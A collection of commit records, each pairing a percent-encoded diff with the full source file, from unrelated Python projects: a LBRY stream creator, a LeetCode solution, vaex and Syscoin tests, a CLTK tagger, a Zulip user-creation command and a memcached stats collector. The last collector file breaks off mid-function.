-from django.utils import timezone%0A
from
@@ -399,16 +399,50 @@
rary()%0A%0A
+from django.utils import timezone%0A
from pyt
|
d7bfeae6b8346efa49c00dd19395e20a3e28404c
|
fix position of stream terminator blob
|
lbrynet/cryptstream/CryptStreamCreator.py
|
lbrynet/cryptstream/CryptStreamCreator.py
|
"""
Utility for creating Crypt Streams, which are encrypted blobs and associated metadata.
"""
import logging
from twisted.internet import interfaces, defer
from zope.interface import implements
from Crypto import Random
from Crypto.Cipher import AES
from lbrynet.cryptstream.CryptBlob import CryptStreamBlobMaker
log = logging.getLogger(__name__)
class CryptStreamCreator(object):
"""
Create a new stream with blobs encrypted by a symmetric cipher.
Each blob is encrypted with the same key, but each blob has its
own initialization vector which is associated with the blob when
the blob is associated with the stream.
"""
implements(interfaces.IConsumer)
def __init__(self, blob_manager, name=None, key=None, iv_generator=None):
"""@param blob_manager: Object that stores and provides access to blobs.
@type blob_manager: BlobManager
@param name: the name of the stream, which will be presented to the user
@type name: string
@param key: the raw AES key which will be used to encrypt the
blobs. If None, a random key will be generated.
@type key: string
@param iv_generator: a generator which yields initialization
vectors for the blobs. Will be called once for each blob.
@type iv_generator: a generator function which yields strings
@return: None
"""
self.blob_manager = blob_manager
self.name = name
self.key = key
if iv_generator is None:
self.iv_generator = self.random_iv_generator()
else:
self.iv_generator = iv_generator
self.stopped = True
self.producer = None
self.streaming = None
self.blob_count = -1
self.current_blob = None
self.finished_deferreds = []
def registerProducer(self, producer, streaming):
from twisted.internet import reactor
self.producer = producer
self.streaming = streaming
self.stopped = False
if streaming is False:
reactor.callLater(0, self.producer.resumeProducing)
def unregisterProducer(self):
self.stopped = True
self.producer = None
def _close_current_blob(self):
# close the blob that was being written to
# and save it to blob manager
should_announce = self.blob_count == 0
d = self.current_blob.close()
d.addCallback(self._blob_finished)
d.addCallback(lambda blob_info: self.blob_manager.creator_finished(blob_info,
should_announce))
self.finished_deferreds.append(d)
self.current_blob = None
def stop(self):
"""Stop creating the stream. Create the terminating zero-length blob."""
log.debug("stop has been called for StreamCreator")
self.stopped = True
if self.current_blob is not None:
self._close_current_blob()
self._finalize()
dl = defer.DeferredList(self.finished_deferreds)
dl.addCallback(lambda _: self._finished())
return dl
# TODO: move the stream creation process to its own thread and
# remove the reactor from this process.
def write(self, data):
from twisted.internet import reactor
self._write(data)
if self.stopped is False and self.streaming is False:
reactor.callLater(0, self.producer.resumeProducing)
@staticmethod
def random_iv_generator():
while 1:
yield Random.new().read(AES.block_size)
def setup(self):
"""Create the symmetric key if it wasn't provided"""
if self.key is None:
self.key = Random.new().read(AES.block_size)
return defer.succeed(True)
def _finalize(self):
"""
Finalize a stream by adding an empty
blob at the end, this is to indicate that
the stream has ended. This empty blob is not
saved to the blob manager
"""
log.debug("_finalize has been called")
self.blob_count += 1
iv = self.iv_generator.next()
final_blob_creator = self.blob_manager.get_blob_creator()
final_blob = self._get_blob_maker(iv, final_blob_creator)
d = final_blob.close()
d.addCallback(self._blob_finished)
self.finished_deferreds.append(d)
def _write(self, data):
while len(data) > 0:
if self.current_blob is None:
self.next_blob_creator = self.blob_manager.get_blob_creator()
self.blob_count += 1
iv = self.iv_generator.next()
self.current_blob = self._get_blob_maker(iv, self.next_blob_creator)
done, num_bytes_written = self.current_blob.write(data)
data = data[num_bytes_written:]
if done is True:
self._close_current_blob()
def _get_blob_maker(self, iv, blob_creator):
return CryptStreamBlobMaker(self.key, iv, self.blob_count, blob_creator)
def _finished(self):
raise NotImplementedError()
def _blob_finished(self, blob_info):
raise NotImplementedError()
|
Python
| 0.000003
|
@@ -2979,24 +2979,28 @@
ob()%0A
+ d =
self._final
@@ -3018,66 +3018,8 @@
d
-l = defer.DeferredList(self.finished_deferreds)%0A dl
.add
@@ -3071,17 +3071,16 @@
return d
-l
%0A%0A #
@@ -3736,24 +3736,51 @@
ceed(True)%0A%0A
+ @defer.inlineCallbacks%0A
def _fin
@@ -3994,32 +3994,33 @@
%22%22%22%0A
+%0A
log.debug(%22_
@@ -4011,45 +4011,56 @@
-log.debug(%22_finalize has been called%22
+yield defer.DeferredList(self.finished_deferreds
)%0A
@@ -4138,34 +4138,51 @@
final_blob
-_creator =
+ = self._get_blob_maker(iv,
self.blob_m
@@ -4198,32 +4198,33 @@
t_blob_creator()
+)
%0A final_b
@@ -4220,180 +4220,165 @@
-final_blob = self._get_blob_maker(iv, final_blob_creator)%0A d = final_blob.close()%0A d.addCallback(self._blob_finished)%0A self.finished_
+stream_terminator = yield final_blob.close()%0A terminator_info = yield self._blob_finished(stream_terminator)%0A
defer
+.
re
-ds.append(d
+turnValue(terminator_info
)%0A%0A
|
827c11e1ac31bdbf0c853350464a2a4d55a82124
|
Add comments
|
lc0121_best_time_to_buy_and_sell_stock.py
|
lc0121_best_time_to_buy_and_sell_stock.py
|
"""Leetcode 121. Best Time to Buy and Sell Stock
Easy
URL: https://leetcode.com/problems/best-time-to-buy-and-sell-stock/
Say you have an array for which the ith element is the price of a given stock on day i.
If you were only permitted to complete at most one transaction
(i.e., buy one and sell one share of the stock),
design an algorithm to find the maximum profit.
Note that you cannot sell a stock before you buy one.
Example 1:
Input: [7,1,5,3,6,4]
Output: 5
Explanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.
Not 7-1 = 6, as selling price needs to be larger than buying price.
Example 2:
Input: [7,6,4,3,1]
Output: 0
Explanation: In this case, no transaction is done, i.e. max profit = 0.
"""
class SolutionNaive(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
Note: Time limit exceeded.
Time complexity: O(n^2), where n is the number of prices.
Space complexity: O(1).
"""
if not prices:
return 0
profit = 0
n = len(prices)
for i in range(n - 1):
for j in range(i + 1, n):
if prices[j] - prices[i] > profit:
profit = prices[j] - prices[i]
return profit
class SolutionDivideAndConquer(object):
def _divideAndConquer(self, prices, i, j):
if i == j:
# Only one date, thus we cannot buy and then sell.
return 0
mid = i + (j - i) // 2
# Compute profits in left and right subarrays.
left_profit = self._divideAndConquer(prices, i, mid)
right_profit = self._divideAndConquer(prices, mid + 1, j)
# Compute crossmax for buying in left and selling in right.
left_min = prices[i]
for l in range(i + 1, mid + 1):
if prices[l] < left_min:
left_min = prices[l]
right_max = prices[mid + 1]
for r in range(mid + 2, j + 1):
if prices[r] > right_max:
right_max = prices[r]
cross_profit = max(0, right_max - left_min)
return max(left_profit, right_profit, cross_profit)
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
Time complexity: O(n*logn), where n is the number of prices.
Space complexity: O(1).
"""
if not prices:
return 0
left, right = 0, len(prices) - 1
return self._divideAndConquer(prices, left, right)
class SolutionIter(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
Time complexity: O(n), where n is the number of prices.
Space complexity: O(1).
"""
if not prices:
return 0
minimun = prices[0]
profit = 0
for i in range(1, len(prices)):
current = prices[i]
# Update the latest max profit.
cur_profit = current - minimun
profit = max(cur_profit, profit)
# Update the latest minimum.
minimun = min(current, minimun)
return profit
def main():
import time
# Ans: 5
prices = [7,1,5,3,6,4]
start_time = time.time()
print 'By naive:', SolutionNaive().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By divide-and-conquer:', SolutionDivideAndConquer().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By iter:', SolutionIter().maxProfit(prices)
print 'Time:', time.time() - start_time
# Ans: 6
prices = [6,1,3,2,4,7]
start_time = time.time()
print 'By naive:', SolutionNaive().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By divide-and-conquer:', SolutionDivideAndConquer().maxProfit(prices)
print 'Time:', time.time() - start_time
start_time = time.time()
print 'By iter:', SolutionIter().maxProfit(prices)
print 'Time:', time.time() - start_time
if __name__ == '__main__':
main()
|
Python
| 0
|
@@ -2845,32 +2845,90 @@
return 0%0A
+ %0A # Continue tracking minimum price and profit.
%0A minimun
|
3a80367a61ddf958dc62d8082bc4e463709cbdef
|
Test bad value colors
|
vaex/test/plot.py
|
vaex/test/plot.py
|
__author__ = 'maartenbreddels'
import unittest
import os
import tempfile
import logging
import shutil
import numpy as np
import PIL.Image
import PIL.ImageChops
import pylab as plt
import vaex as vx
import vaex.utils
try:
raw_input = input
except:
pass # py2/3 fix
base_path = os.path.dirname(__file__)
def get_comparison_image(name):
osname = vaex.utils.osname
return os.path.join(base_path, "images", name+"_" + osname + ".png")
overwrite_images = False
class check_output(object):
def __init__(self, name):
self.name = name
self.fn = get_comparison_image(name)
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
plt.close()
return
fn = tempfile.mktemp(".png")
plt.savefig(fn)
if not os.path.exists(self.fn):
print("comparison image did not exist, copying to %s" % self.fn)
shutil.copy(fn, self.fn)
image1 = PIL.Image.open(self.fn)
image2 = PIL.Image.open(fn)
diff = PIL.ImageChops.difference(image1, image2)
extrema = diff.getextrema()
for i, (vmin, vmax) in enumerate(extrema):
msg = "difference found between {im1} and {im2} in band {band}\n $ cp {im1} {im2}".format(im1=self.fn, im2=fn,
band=i)
if vmin != vmax and overwrite_images:
image1.show()
image2.show()
done = False
while not done:
answer = raw_input("is the new image ok? [y/N]").lower().strip()
if answer == "n":
self.assertEqual(vmin, 0, msg)
return
if answer == "y":
shutil.copy(fn, self.fn)
return
assert vmin == 0, msg
assert vmax == 0, msg
plt.close()
class TestPlot(unittest.TestCase):
def setUp(self):
self.dataset = vx.example()
def tearDown(self):
if vx.utils.osname != "osx":
self.dataset.close_files()
def test_single(self):
with check_output("single_xy"):
self.dataset.plot("x", "y", title="face on")
def test_multiplot(self):
with check_output("multiplot_xy"):
self.dataset.plot([["x", "y"], ["x", "z"]], title="Face on and edge on", figsize=(10, 4));
def test_multistat(self):
with check_output("multistat"):
self.dataset.plot("x", "y", what=["count(*)", "mean(vx)", "correlation(vy, vz)"], title="Different statistics", figsize=(10,5));
def test_multiplot_multiwhat(self):
with check_output("multiplot_multiwhat"):
self.dataset.plot([["x", "y"], ["x", "z"], ["y", "z"]],
what=["count(*)", "mean(vx)", "correlation(vx, vy)", "correlation(vx, vz)"],
title="Different statistics and plots", figsize=(14, 12));
def test_multistat_multiwhat_swapped(self):
with check_output("multistat_multiwhat_swapped"):
self.dataset.plot([["x", "y"], ["x", "z"], ["y", "z"]],
what=["count(*)", "mean(vx)", "correlation(vx, vy)", "correlation(vx, vz)"],
visual=dict(row="what", column="subspace"),
title="Different statistics and plots", figsize=(14,12));
def test_slice(self):
with check_output("slice"):
self.dataset.plot("Lz", "E", z="FeH:-3,-1,10", show=True, visual=dict(row="z"), figsize=(12,8), f="log", wrap_columns=3);
def test_plot1d(self):
with check_output("plot1d"):
self.dataset.plot1d("Lz");
def test_healpix(self):
self.dataset.add_virtual_columns_cartesian_to_spherical()
self.dataset.add_column_healpix(longitude="l", latitude="b")
with check_output("plot_healpix"):
self.dataset.healpix_plot("healpix");
if __name__ == '__main__':
unittest.main()
|
Python
| 0.000001
|
@@ -1886,16 +1886,262 @@
e on%22)%0A%0A
+%09def test_single_nan(self):%0A%09%09with check_output(%22single_xy_no_nan%22):%0A%09%09%09self.dataset.plot(%22x%22, %22y%22, f=%22log%22)%0A%09%09cm = plt.cm.inferno%0A%09%09cm.set_bad(%22orange%22)%0A%09%09with check_output(%22single_xy_nan%22):%0A%09%09%09self.dataset.plot(%22x%22, %22y%22, f=%22log%22, colormap=cm)%0A%0A
%09def tes
|
3cefa75b8e9012d828453a764c0b169ab169fae6
|
fix google login names; associate with any user with same name
|
chip_friends/security.py
|
chip_friends/security.py
|
import random
import string
from flask import render_template
from flask_security import Security, PeeweeUserDatastore
from flask_social import Social
from flask_social.datastore import PeeweeConnectionDatastore
from flask_social.utils import get_connection_values_from_oauth_response
from flask_social.views import connect_handler, login_user, login_failed
from .app import app, db
from .models import Role, User, UserRoles, Connection
user_datastore = PeeweeUserDatastore(db, User, Role, UserRoles)
app.security = Security(app, user_datastore)
app.social = Social(app, PeeweeConnectionDatastore(db, Connection))
@login_failed.connect_via(app)
def on_login_failed(sender, provider, oauth_response):
connection_values = get_connection_values_from_oauth_response(
provider, oauth_response)
ds = app.security.datastore
password = ''.join(random.choice(string.ascii_letters) for _ in range(20))
user = ds.create_user(
email='', password=password, name=connection_values['full_name'])
ds.commit()
connection_values['user_id'] = user.id
connect_handler(connection_values, provider)
login_user(user)
db.commit()
return render_template('index.html')
|
Python
| 0
|
@@ -1,16 +1,56 @@
+from __future__ import unicode_literals%0A
import random%0Aim
@@ -848,35 +848,218 @@
-ds = app.security.datastore
+name = connection_values%5B'full_name'%5D%0A if isinstance(name, dict):%0A try:%0A name = '%7B%7D %7B%7D'.format(name%5B'givenName'%5D, name%5B'familyName'%5D)%0A except (ValueError, KeyError):%0A pass
%0A
@@ -1146,53 +1146,91 @@
user
- = ds.create_user(%0A
+, new = User.get_or_create(%0A name=name, defaults=%7B'
email
-=
+':
'',
+'
password
=pas
@@ -1229,17 +1229,19 @@
word
-=
+':
password
, na
@@ -1240,62 +1240,69 @@
word
-, name=connection_values%5B'full_name'%5D)%0A ds.commit()
+%7D)%0A # don't bother using the datastore, just use the model
%0A%0A
|
5836b48bbfa87ba706e6ddcb267dc375678695a8
|
use str
|
test/functional/feature_asset_burn.py
|
test/functional/feature_asset_burn.py
|
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class AssetBurnTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 240
self.extra_args = [['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(200)
self.sync_blocks()
self.basic_burn_syscoin()
self.basic_audittxroot1()
def basic_burn_syscoin(self):
self.basic_asset()
self.nodes[0].generate(1)
newaddress = self.nodes[0].getnewaddress()
self.nodes[0].assetsend(self.asset, newaddress, 0.5)
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 1)
# try to burn more than we own
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetallocationburn(self.asset, newaddress, 0.6, '0x931d387731bbbc988b312206c74f77d004d6b84b'))
self.nodes[0].assetallocationburn(self.asset, newaddress, 0.5, '0x931d387731bbbc988b312206c74f77d004d6b84b')
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 0)
def basic_asset(self):
self.asset = self.nodes[0].assetnew('1', 'TST', 'asset description', '0x9f90b5093f35aeac5fbaeb591f9c9de8e2844a46', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetBurnTest().main()
|
Python
| 0.000001
|
@@ -940,19 +940,21 @@
ddress,
+'
0.5
+'
)%0A
@@ -1267,11 +1267,13 @@
ss,
+'
0.6
+'
, '0
@@ -1383,19 +1383,21 @@
ddress,
+'
0.5
+'
, '0x931
|
9d2766a7b6aae9e3ad3c94925bdde100a70f6150
|
fix debug_view function
|
src/psd_tools/debug.py
|
src/psd_tools/debug.py
|
# -*- coding: utf-8 -*-
"""
Assorted debug utilities
"""
from __future__ import absolute_import
import sys
from collections import namedtuple
try:
from IPython.lib.pretty import pprint
_PRETTY_ENABLED = True
except ImportError:
from pprint import pprint
_PRETTY_ENABLED = False
def debug_view(fp, txt="", max_back=20):
"""
Print file contents around current position for file pointer ``fp``
"""
max_back = min(max_back, fp.tell())
fp.seek(-max_back, 1)
pre = fp.read(max_back)
post = fp.read(100)
fp.seek(-100, 1)
print(txt, repr(pre), "--->.<---", repr(post))
def pretty_namedtuple(typename, field_names, verbose=False):
"""
Return a namedtuple class that knows how to pretty-print itself
using IPython.lib.pretty library; if IPython is not installed
then this function is the same as collections.namedtuple
(with one exception: 'rename' argument is unsupported).
"""
cls = namedtuple(typename, field_names, verbose)
if _PRETTY_ENABLED:
PrettyMixin = _get_pretty_mixin(typename)
cls = type(str(typename), (PrettyMixin, cls), {})
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return cls
def _get_pretty_mixin(typename):
"""
Return a mixin class for multiline pretty-printing
of namedtuple objects.
"""
class _PrettyNamedtupleMixin(object):
def _repr_pretty_(self, p, cycle):
if cycle:
return "{typename}(...)".format(name=typename)
with p.group(1, '{name}('.format(name=typename), ')'):
p.breakable()
for idx, field in enumerate(self._fields):
if idx:
p.text(',')
p.breakable()
p.text('{field}='.format(field=field))
p.pretty(getattr(self, field))
return _PrettyNamedtupleMixin
|
Python
| 0.000021
|
@@ -88,16 +88,32 @@
e_import
+, print_function
%0Aimport
|
3baf96f6aaab793467b07aa664aa4bbd6ee7eaac
|
Update pos.py
|
cltk/tag/pos.py
|
cltk/tag/pos.py
|
"""Tag part of speech (POS) using CLTK taggers."""
import os
from nltk.tag import CRFTagger
from nltk.tokenize import wordpunct_tokenize
from cltk.utils.file_operations import open_pickle
__author__ = ['Kyle P. Johnson <kyle@kyle-p-johnson.com>']
__license__ = 'MIT License. See LICENSE.'
TAGGERS = {'greek':
{'unigram': 'unigram.pickle',
'bigram': 'bigram.pickle',
'trigram': 'trigram.pickle',
'ngram_123_backoff': '123grambackoff.pickle',
'tnt': 'tnt.pickle',
'crf': 'crf.pickle',
},
'latin':
{'unigram': 'unigram.pickle',
'bigram': 'bigram.pickle',
'trigram': 'trigram.pickle',
'ngram_123_backoff': '123grambackoff.pickle',
'tnt': 'tnt.pickle',
'crf': 'crf.pickle',
},
'old_norse':
{'tnt': 'tnt.pickle'
}
}
class POSTag:
"""Tag words' parts-of-speech."""
def __init__(self, language: str):
"""Setup variables."""
self.language = language
self.available_taggers = self._setup_language_variables(self.language)
def _setup_language_variables(self, lang: str): # pylint: disable=no-self-use
"""Check for language availability and presence of tagger files.
:param lang: The language argument given to the class.
:type lang: str
:rtype : dict
"""
assert lang in TAGGERS.keys(), \
'POS tagger not available for {0} language.'.format(lang)
rel_path = os.path.join('~/cltk_data',
lang,
'model/' + lang + '_models_cltk/taggers/pos') # pylint: disable=C0301
path = os.path.expanduser(rel_path)
tagger_paths = {}
for tagger_key, tagger_val in TAGGERS[lang].items():
tagger_path = os.path.join(path, tagger_val)
assert os.path.isfile(tagger_path), \
'CLTK linguistics models not available for {0}.'.format(tagger_val)
tagger_paths[tagger_key] = tagger_path
return tagger_paths
def tag_unigram(self, untagged_string: str):
"""Tag POS with unigram tagger.
:type untagged_string: str
:param : An untagged, untokenized string of text.
:rtype tagged_text: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['unigram']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_bigram(self, untagged_string: str):
"""Tag POS with bigram tagger.
:type untagged_string: str
:param : An untagged, untokenized string of text.
:rtype tagged_text: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['bigram']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_trigram(self, untagged_string: str):
"""Tag POS with trigram tagger.
:type untagged_string: str
:param : An untagged, untokenized string of text.
:rtype tagged_text: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['trigram']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_ngram_123_backoff(self, untagged_string: str):
"""Tag POS with 1-, 2-, 3-gram tagger.
:type untagged_string: str
:param : An untagged, untokenized string of text.
:rtype tagged_text: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['ngram_123_backoff']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_tnt(self, untagged_string: str):
"""Tag POS with TnT tagger.
:type untagged_string: str
:param : An untagged, untokenized string of text.
:rtype tagged_text: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['tnt']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_crf(self, untagged_string: str):
"""Tag POS with CRF tagger.
:type untagged_string: str
:param : An untagged, untokenized string of text.
:rtype tagged_text: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['crf']
tagger = CRFTagger()
tagger.set_model_file(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
|
Python
| 0.000001
|
@@ -965,16 +965,124 @@
ickle'%0A
+ %7D,%0A 'middle_low_german':%0A %7B'ngram_12_backoff': 'backoff_tagger.pickle'%0A
@@ -4189,32 +4189,530 @@
urn tagged_text%0A
+ %0A def tag_ngram_12_backoff(self, untagged_string: str):%0A %22%22%22Tag POS with 1-, 2-gram tagger.%0A :type untagged_string: str%0A :param : An untagged, untokenized string of text.%0A :rtype tagged_text: str%0A %22%22%22%0A untagged_tokens = wordpunct_tokenize(untagged_string)%0A pickle_path = self.available_taggers%5B'ngram_12_backoff'%5D%0A tagger = open_pickle(pickle_path)%0A tagged_text = tagger.tag(untagged_tokens)%0A return tagged_text %0A
%0A def tag_tnt
|
2bc1cd6ab4be134758edcc8739b89ce4984131b4
|
Fix overly large try/except block.
|
zerver/management/commands/create_user.py
|
zerver/management/commands/create_user.py
|
import argparse
import logging
from typing import Any, Optional
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.core.management.base import CommandError
from django.db.utils import IntegrityError
from zerver.lib.actions import do_create_user
from zerver.lib.initial_password import initial_password
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """Create the specified user with a default initial password.
Sets tos_version=None, so that the user needs to do a ToS flow on login.
Omit both <email> and <full name> for interactive user creation.
"""
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
self.add_create_user_args(parser)
self.add_realm_args(
parser, required=True, help="The name of the existing realm to which to add the user."
)
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
if "email" not in options:
email = input("Email: ")
else:
email = options["email"]
try:
validators.validate_email(email)
except ValidationError:
raise CommandError("Invalid email address.")
if "full_name" not in options:
full_name = input("Full name: ")
else:
full_name = options["full_name"]
try:
if options["password_file"] is not None:
with open(options["password_file"]) as f:
pw: Optional[str] = f.read().strip()
elif options["password"] is not None:
logging.warning(
"Passing password on the command line is insecure; prefer --password-file."
)
pw = options["password"]
else:
# initial_password will return a random password that
# is a salted hash of the email address in a
# development environment, and None in a production
# environment.
user_initial_password = initial_password(email)
if user_initial_password is None:
logging.info("User will be created with a disabled password.")
else:
assert settings.DEVELOPMENT
logging.info(
"Password will be available via `./manage.py print_initial_password`."
)
pw = user_initial_password
do_create_user(
email,
pw,
realm,
full_name,
# Explicitly set tos_version=None. For servers that
# have configured Terms of Service, this means that
# users created via this mechanism will be prompted to
# accept the Terms of Service on first login.
tos_version=None,
acting_user=None,
)
except IntegrityError:
raise CommandError("User already exists.")
|
Python
| 0
|
@@ -1511,33 +1511,16 @@
name%22%5D%0A%0A
- try:%0A
@@ -1572,20 +1572,16 @@
-
-
with ope
@@ -1630,20 +1630,16 @@
-
pw: Opti
@@ -1667,20 +1667,16 @@
strip()%0A
-
@@ -1717,36 +1717,32 @@
ne:%0A
-
logging.warning(
@@ -1742,20 +1742,16 @@
arning(%0A
-
@@ -1842,34 +1842,26 @@
-
- )%0A
+)%0A
@@ -1889,38 +1889,30 @@
d%22%5D%0A
-
-
else:%0A
-
@@ -1961,28 +1961,24 @@
ssword that%0A
-
@@ -2034,20 +2034,16 @@
-
# develo
@@ -2098,20 +2098,16 @@
-
# enviro
@@ -2125,20 +2125,16 @@
-
-
user_ini
@@ -2185,20 +2185,16 @@
-
if user_
@@ -2227,36 +2227,32 @@
-
-
logging.info(%22Us
@@ -2306,38 +2306,30 @@
-
else:%0A
-
@@ -2368,36 +2368,32 @@
-
-
logging.info(%0A
@@ -2393,33 +2393,8 @@
nfo(
-%0A
%22Pas
@@ -2463,35 +2463,10 @@
d%60.%22
+)
%0A
- )%0A
@@ -2501,16 +2501,29 @@
ssword%0A%0A
+ try:%0A
|
45f3f41fa37192bdd246c390ed577056f5b844d2
|
add test for stitch_coordinates
|
test/test_experiment.py
|
test/test_experiment.py
|
import pytest
from py import path
@pytest.fixture
def experiment(tmpdir):
"'experiment--test' in tmpdir. Returns Experiment object."
from leicaexperiment import Experiment
e = path.local(__file__).dirpath().join('experiment--test')
e.copy(tmpdir.mkdir('experiment'))
return Experiment(tmpdir.join('experiment').strpath)
@pytest.fixture
def ometif16bit(tmpdir):
"16 bit ome.tif image in tmpdir. Returns py.path.local object of image."
image = path.local(__file__).dirpath().join('images', '16bit.ome.tif')
image.copy(tmpdir)
return tmpdir.join(image.basename)
def test_stitching(tmpdir, experiment):
"It should stitch images without error."
files = experiment.stitch(tmpdir.mkdir('stitched').strpath)
# returned files same as output
assert files == tmpdir.join('stitched').listdir(sort=True)
# both channels stitched
assert len(files) == 2
def test_looping(experiment):
"It should be able to loop through wells, fields and images."
for well in experiment.wells:
assert type(well) == str
for field in experiment.fields:
assert type(field) == str
for image in experiment.images:
assert type(image) == str
def test_compression(tmpdir, experiment):
"It should compress and decompress experiment without dataloss."
from leicaexperiment.experiment import decompress
from PIL import Image
import numpy as np
# compress
pngs = experiment.compress(folder=tmpdir.mkdir('pngs').strpath)
# reported output is actually written and the same amount
assert pngs == tmpdir.join('pngs').listdir('*.png', sort=True)
assert len(pngs) == len(experiment.images)
# keep data for decompress test
origs = []
orig_tags = []
# check that compression is lossless
for tif,png in zip(experiment.images, pngs):
img = Image.open(tif)
orig = np.array(img)
origs.append(orig)
orig_tags.append(img.tag.as_dict())
compressed = np.array(Image.open(png))
# is lossless?
assert np.all(orig == compressed)
new_tifs = decompress(pngs, folder=tmpdir.mkdir('new_tifs').strpath)
# reported output is actually written and the same amount as original
assert new_tifs == tmpdir.join('new_tifs').listdir(sort=True)
assert len(new_tifs) == len(experiment.images)
# orig and decompressed images have similar file size
for orig,new_tif in zip(experiment.images, new_tifs):
diff = abs(path.local(orig).size() - path.local(new_tif).size())
assert diff < 1024
omit_tags = [273, 278, 279]
# check that decompression is lossless
for tif,orig,orig_tag in zip(new_tifs, origs, orig_tags):
img = Image.open(tif)
decompressed = np.array(img)
# compress->decompress is lossless?
assert np.all(orig == decompressed)
# check if TIFF-tags are intact
tag = img.tag.as_dict()
for omit in omit_tags:
del tag[omit]
del orig_tag[omit]
assert tag == orig_tag
def test_stitch_png(tmpdir, experiment):
"It should stitch compressed images."
experiment.compress(delete_tif=True)
files = experiment.stitch(folder=tmpdir.mkdir('stitched').strpath)
# returned files same as output
assert files == tmpdir.join('stitched').listdir(sort=True)
# both channels stitched
assert len(files) == 2
def test_16bit(ometif16bit):
"It should compress and decompress 16 bit TIFF without dataloss."
from leicaexperiment.experiment import compress
from PIL import Image
import numpy as np
tif = ometif16bit.strpath
png = compress(tif)[0]
tif_data = np.array(Image.open(tif))
png_data = np.array(Image.open(png))
assert np.all(tif_data == png_data)
|
Python
| 0.000001
|
@@ -26,16 +26,65 @@
ort path
+%0Afrom leicaexperiment.experiment import attribute
%0A%0A@pytes
@@ -942,32 +942,231 @@
en(files) == 2%0A%0A
+ # stitch_coordinates%0A # images channel 0%0A imgs = %5Bi for i in experiment.images if attribute(i, 'c') == 0%5D%0A attrs = experiment.stitch_coordinates()%5B2%5D%0A assert len(attrs) == len(imgs)%0A%0A
%0Adef test_loopin
|
71ff3df25e91bbce77d68b154947e9d8f08b7d18
|
call socket.recv multiple times to get all stats
|
src/collectors/memcached/memcached.py
|
src/collectors/memcached/memcached.py
|
# coding=utf-8
"""
Collect memcached stats
#### Dependencies
* subprocess
#### Example Configuration
MemcachedCollector.conf
```
enabled = True
hosts = localhost:11211, app-1@localhost:11212, app-2@localhost:11213, etc
```
TO use a unix socket, set a host string like this
```
hosts = /path/to/blah.sock, app-1@/path/to/bleh.sock,
```
"""
import diamond.collector
import socket
import re
class MemcachedCollector(diamond.collector.Collector):
GAUGES = [
'bytes',
'connection_structures',
'curr_connections',
'curr_items',
'threads',
'reserved_fds',
'limit_maxbytes',
'hash_power_level',
'hash_bytes',
'hash_is_expanding',
'uptime'
]
def get_default_config_help(self):
config_help = super(MemcachedCollector, self).get_default_config_help()
config_help.update({
'publish':
"Which rows of 'status' you would like to publish." +
" Telnet host port' and type stats and hit enter to see the" +
" list of possibilities. Leave unset to publish all.",
'hosts':
"List of hosts, and ports to collect. Set an alias by " +
" prefixing the host:port with alias@",
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(MemcachedCollector, self).get_default_config()
config.update({
'path': 'memcached',
# Which rows of 'status' you would like to publish.
# 'telnet host port' and type stats and hit enter to see the list of
# possibilities.
# Leave unset to publish all
# 'publish': ''
# Connection settings
'hosts': ['localhost:11211']
})
return config
def get_raw_stats(self, host, port):
data = ''
# connect
try:
if port is None:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(host)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, int(port)))
# request stats
sock.send('stats\n')
# something big enough to get whatever is sent back
data = sock.recv(4096)
except socket.error:
self.log.exception('Failed to get stats from %s:%s',
host, port)
return data
def get_stats(self, host, port):
# stuff that's always ignored, aren't 'stats'
